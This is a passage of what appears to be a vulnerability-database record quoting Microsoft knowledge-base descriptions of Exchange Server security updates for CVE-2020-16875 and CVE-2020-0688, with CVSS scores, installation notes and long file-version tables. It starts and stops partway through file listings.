15.1.1979.6| 30,088| 12-Aug-2020| 20:51| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,252| 12-Aug-2020| 20:49| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,567| 12-Aug-2020| 20:49| Not applicable \nNtspxgen.dll| 15.1.1979.6| 80,776| 12-Aug-2020| 20:51| x64 \nOleconverter.exe| 15.1.1979.6| 173,952| 12-Aug-2020| 20:48| x64 \nOutsideinmodule.dll| 15.1.1979.6| 87,936| 12-Aug-2020| 20:48| x64 \nOwaauth.dll| 15.1.1979.6| 92,032| 12-Aug-2020| 20:51| x64 \nOwasmime.msi| Not applicable| 720,896| 12-Aug-2020| 20:49| Not applicable \nPerf_common_extrace.dll| 15.1.1979.6| 245,128| 12-Aug-2020| 20:47| x64 \nPerf_exchmem.dll| 15.1.1979.6| 85,896| 12-Aug-2020| 20:47| x64 \nPipeline2.dll| 15.1.1979.6| 1,454,464| 12-Aug-2020| 20:48| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.1979.6| 41,344| 12-Aug-2020| 20:49| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,983| 12-Aug-2020| 20:49| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,217| 12-Aug-2020| 20:49| Not applicable \nProductinfo.managed.dll| 15.1.1979.6| 27,016| 12-Aug-2020| 20:49| x86 \nProxybinclientsstringsdll| 15.1.1979.6| 924,544| 12-Aug-2020| 20:49| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,226| 12-Aug-2020| 20:49| Not applicable \nQuietexe.exe| 15.1.1979.6| 14,720| 12-Aug-2020| 20:49| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,540| 12-Aug-2020| 20:51| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,659| 12-Aug-2020| 20:48| Not applicable \nRemoteexchange.ps1| Not applicable| 23,561| 12-Aug-2020| 20:49| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,672| 12-Aug-2020| 20:49| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,990| 12-Aug-2020| 20:49| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,000| 12-Aug-2020| 20:49| Not applicable \nReplaycrimsonmsg.dll| 15.1.1979.6| 1,099,144| 12-Aug-2020| 20:49| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,464| 12-Aug-2020| 20:49| Not applicable \nResetcasservice.ps1| Not applicable| 21,695| 12-Aug-2020| 20:49| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,105| 12-Aug-2020| 20:51| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,129| 12-Aug-2020| 20:50| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,214| 12-Aug-2020| 20:48| Not applicable \nRightsmanagementwrapper.dll| 15.1.1979.6| 86,408| 12-Aug-2020| 20:49| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,778| 12-Aug-2020| 20:49| Not applicable \nRpcperf.dll| 15.1.1979.6| 23,432| 12-Aug-2020| 20:49| x64 \nRpcproxyshim.dll| 15.1.1979.6| 39,304| 12-Aug-2020| 20:49| x64 \nRulesauditmsg.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:49| x64 \nRwsperfcounters.xml| Not applicable| 22,216| 12-Aug-2020| 20:50| Not applicable \nSafehtmlnativewrapper.dll| 15.1.1979.6| 34,688| 12-Aug-2020| 20:49| x64 \nScanenginetest.exe| 15.1.1979.6| 956,296| 12-Aug-2020| 20:49| x64 \nScanningprocess.exe| 15.1.1979.6| 739,192| 12-Aug-2020| 20:49| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,800| 12-Aug-2020| 20:49| Not applicable \nServicecontrol.ps1| Not applicable| 52,317| 12-Aug-2020| 20:48| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,742| 12-Aug-2020| 20:50| Not applicable \nSettingsadapter.dll| 15.1.1979.6| 116,104| 12-Aug-2020| 20:49| x64 \nSetup.exe| 15.1.1979.6| 20,864| 12-Aug-2020| 20:49| x86 \nSetupui.exe| 15.1.1979.6| 49,032| 12-Aug-2020| 20:49| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,177| 12-Aug-2020| 20:49| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,835| 12-Aug-2020| 20:48| Not applicable \nStatisticsutil.dll| 15.1.1979.6| 142,208| 12-Aug-2020| 20:48| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,137| 12-Aug-2020| 20:49| Not applicable \nStoretsconstants.ps1| Not applicable| 15,834| 12-Aug-2020| 20:51| Not applicable \nStoretslibrary.ps1| Not applicable| 28,007| 12-Aug-2020| 20:51| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.1979.6| 28,552| 12-Aug-2020| 20:51| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,915| 12-Aug-2020| 20:49| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,961| 12-Aug-2020| 20:49| Not applicable \nTextconversionmodule.dll| 15.1.1979.6| 86,400| 12-Aug-2020| 20:49| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,731| 12-Aug-2020| 20:51| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,437| 12-Aug-2020| 20:51| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,033| 12-Aug-2020| 20:51| Not applicable \nUmservice.exe| 15.1.1979.6| 100,224| 12-Aug-2020| 20:49| x86 \nUmworkerprocess.exe| 15.1.1979.6| 38,272| 12-Aug-2020| 20:50| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,477| 12-Aug-2020| 20:51| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,018| 12-Aug-2020| 20:51| Not applicable \nUpdatecas.ps1| Not applicable| 32,936| 12-Aug-2020| 20:49| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 12-Aug-2020| 20:49| Not applicable \nUpdateserver.exe| 15.1.1979.6| 3,014,528| 12-Aug-2020| 20:48| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,144| 12-Aug-2020| 20:51| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,815| 12-Aug-2020| 20:47| Not applicable \nWsbexchange.exe| 15.1.1979.6| 125,320| 12-Aug-2020| 20:49| x64 \nX400prox.dll| 15.1.1979.6| 103,296| 12-Aug-2020| 20:48| x64 \n_search.lingoperators.a| 15.1.1979.6| 34,688| 12-Aug-2020| 20:49| Not applicable \n_search.lingoperators.b| 15.1.1979.6| 34,688| 12-Aug-2020| 20:49| Not applicable \n_search.mailboxoperators.a| 15.1.1979.6| 289,152| 12-Aug-2020| 20:49| Not applicable \n_search.mailboxoperators.b| 15.1.1979.6| 289,152| 12-Aug-2020| 20:49| Not applicable \n_search.operatorschema.a| 15.1.1979.6| 483,208| 12-Aug-2020| 20:49| Not applicable \n_search.operatorschema.b| 15.1.1979.6| 483,208| 12-Aug-2020| 20:49| Not applicable \n_search.tokenoperators.a| 15.1.1979.6| 106,880| 12-Aug-2020| 20:49| Not applicable \n_search.tokenoperators.b| 15.1.1979.6| 106,880| 12-Aug-2020| 20:49| Not applicable \n_search.transportoperators.a| 15.1.1979.6| 64,896| 12-Aug-2020| 20:49| Not applicable \n_search.transportoperators.b| 15.1.1979.6| 64,896| 12-Aug-2020| 20:49| Not applicable \n \nInformation about protection and securityProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-08T07:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2019 and 2016: September 8, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-08T07:00:00", "id": "KB4577352", "href": "https://support.microsoft.com/en-us/help/4577352", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:34", "description": "None\nThis update rollup is a security update that provides a security advisory in Microsoft Exchange. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688>)\nThis update also fixes the following issue:4540267 MSExchangeDelivery.exe or EdgeTransport.exe crashes in Exchange Server 2013 and Exchange Server 2010\n\n## Known issues in this security update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur when you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\$v=ws.10\$.aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)](<http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107>)\n\n## Update detail information for Exchange Server 2010 SP3\n\n### Installation instructions for Exchange Server 2010 SP3\n\nLearn more about [how to install the latest update rollup for Exchange Server 2010](<http://technet.microsoft.com/library/ff637981.aspx>).Also, learn about the following update installation scenarios.\n\n## \n\n__\n\nInstall the update on computers that aren't connected to the internet\n\nWhen you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:\n\nCreating Native images for .Net assemblies.\n\nThis issue is caused by network requests to connect to the following website: \n[http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl](<http://crl.microsoft.com/pki/crl/products/codesigpca.crl>) \n \nThese network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue. \n \nTo fix this issue, follow these steps: \n\n\n 1. In Internet Explorer, select **Internet Options** on the **Tools** menu, and then select **Advanced**.\n 2. In the **Security** section, clear the **Check for publisher's certificate revocation** check box, and then select **OK**. \n \n**Note** Clear this security option only if the computer is in a tightly-controlled environment. \n 3. When the Setup process is finished, select the **Check for publisher's certificate revocation** check box again.\n\n## \n\n__\n\nInstall the update on computers that have customized Outlook Web App files\n\n**Important **Before you apply this update rollup, make a backup copy of any [customized Outlook Web App](<http://technet.microsoft.com/library/ee633483\$exchg.140\$.aspx>) files. \n \nWhen you apply an update rollup package, the update process updates the Outlook Web App files, if this is required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.\n\n## \n\n__\n\nInstall the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying\n\nIf your scenario meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:\n\n * You're a CAS Proxy Deployment Guidance customer.\n * You have deployed [CAS-CAS proxying](<http://technet.microsoft.com/library/bb310763\$exchg.140\$.aspx>).\n**Note **For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.\n\n## \n\n__\n\nInstall this update on a DBCS version of Windows Server 2012\n\nYou can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:\n\n 1. In Control Panel, select **Clock, Region and Language**, select **Region**, and then select **Administrative**.\n 2. In the **Language for non-Unicode programs** area, select **Change system locale**.\n 3. In the **Current system locale** list, select **English (United States)**, and then select **OK**.\nAfter you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.\n\nRestart requirementThe required services are restarted automatically after you apply this update rollup.Removal informationTo remove Update Rollup 30 for Exchange Server 2010 SP3, use the **Add or Remove Programs** item in Control Panel to remove update **KB4536989**.More informationSecurity update deployment informationFor deployment information about this update, see [security update deployment information: February 11, 2020](<https://support.microsoft.com/help/20200211>). Security update replacement informationThis security update replaces the following previously released update:\n\n * Description of the security update for Microsoft Exchange Server 2010: July 9, 2019\nFile informationFile hash informationUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nUpdate Rollup 30 for Exchange Server 2010| Exchange2010-KB4536989-x64-en.msp| 2DD3EB1C737743941FB56293BB9A68242F0F52E2| 95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4 \nExchange Server file informationThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nUpdate Rollup 30 for Exchange Server 2010\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nA33e7066a3f143ef8386e08c4458051d_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nAbv_dg.dll| 14.3.470.0| 898,992| 03-Jan-2020| 05:46| x64 \nAddreplicatopfrecursive.ps1| Not applicable| 13,837| 03-Jan-2020| 05:47| Not applicable \nAddressbook.aspx| Not applicable| 3,830| 03-Jan-2020| 05:49| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 13,465| 03-Jan-2020| 05:47| Not applicable \nAf46d2bd14db43e0b49619bd0eeb07ec_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nAggregatepfdata.ps1| Not applicable| 17,393| 03-Jan-2020| 05:47| Not applicable \nAirfilter.dll| 14.3.470.0| 49,584| 03-Jan-2020| 05:48| x64 \nAirsynctistateparser.dll| 14.3.470.0| 83,376| 03-Jan-2020| 05:48| x64 \nAjaxcontroltoolkit.dll| 14.3.470.0| 110,280| 03-Jan-2020| 05:48| x86 \nAlsperf.dll1| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| Not applicable \nAntispamcommon.ps1| Not applicable| 11,413| 03-Jan-2020| 05:46| Not applicable \nAsdat.msi| Not applicable| 5,083,136| 03-Jan-2020| 05:46| Not applicable \nAsentirs.msi| Not applicable| 73,728| 03-Jan-2020| 05:50| Not applicable \nAsentsig.msi| Not applicable| 73,728| 03-Jan-2020| 05:50| Not applicable \nAttachfiledialog.aspx| Not applicable| 5,346| 03-Jan-2020| 05:49| Not applicable \nAutodisc_web.config| Not applicable| 89,637| 03-Jan-2020| 05:49| Not applicable \nBasicaddressbook.aspx| Not applicable| 4,217| 03-Jan-2020| 05:49| Not applicable \nBasicattachmentmanager.aspx| Not applicable| 3,826| 03-Jan-2020| 05:49| Not applicable \nBasicautosaveinfo.aspx| Not applicable| 4,255| 03-Jan-2020| 05:49| Not applicable \nBasiccalendaritemschedulingtab.aspx| Not applicable| 6,908| 03-Jan-2020| 05:49| Not applicable \nBasiccalendarview.aspx| Not applicable| 3,259| 03-Jan-2020| 05:49| Not applicable \nBasiccontactview.aspx| Not applicable| 3,586| 03-Jan-2020| 05:49| Not applicable \nBasiccontactviewwebpart.aspx| Not applicable| 2,485| 03-Jan-2020| 05:49| Not applicable \nBasiceditcalendaritem.aspx| Not applicable| 17,517| 03-Jan-2020| 05:49| Not applicable \nBasiceditcontact.aspx| Not applicable| 6,356| 03-Jan-2020| 05:49| Not applicable \nBasiceditmeetingresponse.aspx| Not applicable| 11,664| 03-Jan-2020| 05:49| Not applicable \nBasiceditmessage.aspx| Not applicable| 8,801| 03-Jan-2020| 05:49| Not applicable \nBasiceditrecurrence.aspx| Not applicable| 14,645| 03-Jan-2020| 05:49| Not applicable \nBasicfoldermanagement.aspx| Not applicable| 3,630| 03-Jan-2020| 05:49| Not applicable \nBasicmeetingpage.aspx| Not applicable| 12,659| 03-Jan-2020| 05:49| Not applicable \nBasicmessageview.aspx| Not applicable| 4,084| 03-Jan-2020| 05:49| Not applicable \nBasicmessageviewwebpart.aspx| Not applicable| 2,625| 03-Jan-2020| 05:49| Not applicable \nBasicmoveitem.aspx| Not applicable| 4,112| 03-Jan-2020| 05:49| Not applicable \nBasicoptions.aspx| Not applicable| 3,506| 03-Jan-2020| 05:49| Not applicable \nBasicreadaddistributionlist.aspx| Not applicable| 4,364| 03-Jan-2020| 05:49| Not applicable \nBasicreadadorgperson.aspx| Not applicable| 4,434| 03-Jan-2020| 05:49| Not applicable \nBasicreadcontact.aspx| Not applicable| 4,406| 03-Jan-2020| 05:49| Not applicable \nBasicreaddistributionlist.aspx| Not applicable| 4,864| 03-Jan-2020| 05:49| Not applicable \nBasicreadmessage.aspx| Not applicable| 7,071| 03-Jan-2020| 05:49| Not applicable \nBpa.common.dll| 14.3.470.0| 233,160| 03-Jan-2020| 05:48| x86 \nBpa.configcollector.dll| 14.3.470.0| 126,664| 03-Jan-2020| 05:48| x86 \nBpa.networkcollector.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:48| x86 \nBpa.userinterface.dll| 14.3.470.0| 536,264| 03-Jan-2020| 05:48| x86 \nBpa.wizardengine.dll| 14.3.470.0| 134,856| 03-Jan-2020| 05:49| x86 \nBsres.dll| 14.3.470.0| 92,592| 03-Jan-2020| 05:47| x64 \nC3197ef34a9e495cb17370b20389036a_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nC4f748eeabe04db79b17bab56b1285a4_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nCalcalculation.ps1| Not applicable| 29,804| 03-Jan-2020| 05:47| Not applicable \nCaptedt.js| Not applicable| 11,208| 03-Jan-2020| 05:46| Not applicable \nCasredirect.aspx| Not applicable| 4,842| 03-Jan-2020| 05:49| Not applicable \nCb8b92743d7f42a7b8e53fe033206469_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 80,171| 03-Jan-2020| 05:47| Not applicable \nCheckinvalidrecipients.ps1| Not applicable| 20,921| 03-Jan-2020| 05:47| Not applicable \nChksgfiles.dll| 14.3.470.0| 64,944| 03-Jan-2020| 05:46| x64 \nCitsconstants.ps1| Not applicable| 19,383| 03-Jan-2020| 05:49| Not applicable \nCitslibrary.ps1| Not applicable| 171,567| 03-Jan-2020| 05:49| Not applicable \nCitstypes.ps1| Not applicable| 16,664| 03-Jan-2020| 05:49| Not applicable \nClusmsg.dll| 14.3.470.0| 110,512| 03-Jan-2020| 05:48| x64 \nCmmap000.bin| Not applicable| 381,737| 03-Jan-2020| 05:49| Not applicable \nCmn.js| Not applicable| 7,356| 03-Jan-2020| 05:46| Not applicable \nCobrandingdiagnostics.aspx| Not applicable| 1,649| 03-Jan-2020| 05:49| Not applicable \nCollectovermetrics.ps1| Not applicable| 77,533| 03-Jan-2020| 05:47| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 39,794| 03-Jan-2020| 05:47| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 27,543| 03-Jan-2020| 05:45| Not applicable \nConfigureadam.ps1| Not applicable| 21,183| 03-Jan-2020| 05:47| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 16,878| 03-Jan-2020| 05:47| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 37,701| 03-Jan-2020| 05:47| Not applicable \nConnectfunctions.ps1| Not applicable| 32,908| 03-Jan-2020| 05:47| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 28,838| 03-Jan-2020| 05:47| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,273| 03-Jan-2020| 05:45| Not applicable \nConvertoabvdir.ps1| Not applicable| 17,929| 03-Jan-2020| 05:47| Not applicable \nConverttomessagelatency.ps1| Not applicable| 12,408| 03-Jan-2020| 05:47| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCtsvw.js| Not applicable| 1,982| 03-Jan-2020| 05:46| Not applicable \nCts_exsmime.dll| 14.3.470.0| 319,920| 03-Jan-2020| 05:46| x64 \nCts_microsoft.exchange.data.common.dll| 14.3.470.0| 1,547,976| 03-Jan-2020| 05:46| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nDaddrbk.js| Not applicable| 5,533| 03-Jan-2020| 05:46| Not applicable \nDagcommonlibrary.ps1| Not applicable| 47,638| 03-Jan-2020| 05:47| Not applicable \nDattach.js| Not applicable| 2,597| 03-Jan-2020| 05:46| Not applicable \nDess.dll| 8.5.3.76| 202,080| 03-Jan-2020| 05:49| x64 \nDevect.dll| 8.5.3.76| 1,883,488| 03-Jan-2020| 05:49| x64 \nDewp.dll| 8.5.3.76| 294,240| 03-Jan-2020| 05:49| x64 \nDf9d06af701642c98d336e7d2e95781c_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nDiagnosticcmdletcontroller.dll| 14.3.470.0| 47,560| 03-Jan-2020| 05:46| x64 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 14,864| 03-Jan-2020| 05:49| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 11,238| 03-Jan-2020| 05:47| Not applicable \nDisable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 03-Jan-2020| 05:48| Not applicable \nDsaccess.dll| 14.3.470.0| 842,160| 03-Jan-2020| 05:46| x64 \nDsaccessperf.dll| 14.3.470.0| 53,680| 03-Jan-2020| 05:46| x64 \nDscperf.dll| 14.3.470.0| 31,664| 03-Jan-2020| 05:46| x64 \nDup_cts_microsoft.exchange.data.common.dll| 14.3.470.0| 1,547,976| 03-Jan-2020| 05:46| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 14.3.470.0| 335,704| 03-Jan-2020| 05:46| x86 \nEcpperfcounters.xml| Not applicable| 29,280| 03-Jan-2020| 05:48| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEdgetransport.exe| 14.3.470.0| 35,976| 03-Jan-2020| 05:48| x86 \nEditorstandalone.js| Not applicable| 298,514| 03-Jan-2020| 05:46| Not applicable \nEdittask.aspx| Not applicable| 11,565| 03-Jan-2020| 05:49| Not applicable \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,312| 03-Jan-2020| 05:46| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,312| 03-Jan-2020| 05:46| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEf306e728a08437e80fe5a896ded4b48_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nEnableinmemorytracing.ps1| Not applicable| 11,240| 03-Jan-2020| 05:47| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 16,474| 03-Jan-2020| 05:47| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 26,785| 03-Jan-2020| 05:47| Not applicable \nEnable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 03-Jan-2020| 05:48| Not applicable \nEscprint.dll| 14.3.470.0| 28,104| 03-Jan-2020| 05:48| x64 \nEse.dll| 14.3.470.0| 3,226,056| 03-Jan-2020| 05:46| x64 \nEseback2.dll| 14.3.470.0| 170,928| 03-Jan-2020| 05:48| x64 \nEsebcli2.dll| 14.3.470.0| 118,704| 03-Jan-2020| 05:48| x64 \nEseperf.dll| 14.3.470.0| 63,408| 03-Jan-2020| 05:48| x64 \nEseutil.exe| 14.3.470.0| 328,624| 03-Jan-2020| 05:48| x64 \nEsevss.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:48| x64 \nExabp.dll| 14.3.470.0| 266,672| 03-Jan-2020| 05:48| x64 \nExbpa.config.xml| Not applicable| 1,150,789| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.clientaccess.xml| Not applicable| 18,445| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.global.xml| Not applicable| 18,835| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.mailbox.xml| 